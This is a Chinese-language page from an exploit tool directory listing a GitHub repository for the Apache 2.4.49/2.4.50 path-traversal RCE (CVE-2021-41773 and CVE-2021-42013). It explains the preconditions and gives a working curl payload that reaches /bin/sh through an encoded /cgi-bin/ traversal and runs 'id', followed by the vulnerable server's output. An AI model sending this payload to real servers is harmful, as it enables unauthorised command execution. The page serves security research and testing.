Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41773 — Apache服务器的远程代码执行漏洞利用。受影响版本:Apache 2.4.49、Apache 2.4.50 | Kitploit
工具/GitHubGitHub/mr-exo/cve-2021-41773
侦察Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Apache服务器的远程代码执行漏洞利用。受影响版本:Apache 2.4.49、Apache 2.4.50

查看仓库
114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache 2.4.49(CVE-2021-41773)和 2.4.50(CVE-2021-42013)的 RCE 利用:

依我拙见,只有“特殊”配置的服务器才会受到此 RCE 的影响。
您之前看到的“任意文件读取”漏洞也是如此。

这两个 CVE 实际上几乎是相同的路径遍历漏洞(第二个是第一个的不完全修复)。
路径遍历仅从映射的 URI 开始生效(例如,通过 Apache 的“Alias”或“ScriptAlias”指令)。仅凭 DocumentRoot 是不够的。

"/cgi-bin/" 默认被映射(ScriptAlias),因此它被用在路径遍历字符串之前。
此外,ScriptAlias 会将指定目录下的所有内容标记为可执行(对于 Apache 而言),无论文件扩展名如何。

要求:

1/ 启用 mod_cgi(非默认,但容易)
2/ 目标二进制文件应为 +x(/bin/sh 默认有执行权限)
3/ Apache 对 /bin 或 / 目录有权限(非默认,且困难/不现实)

检查服务器是否易受攻击:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

易受攻击服务器的响应:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

下载工具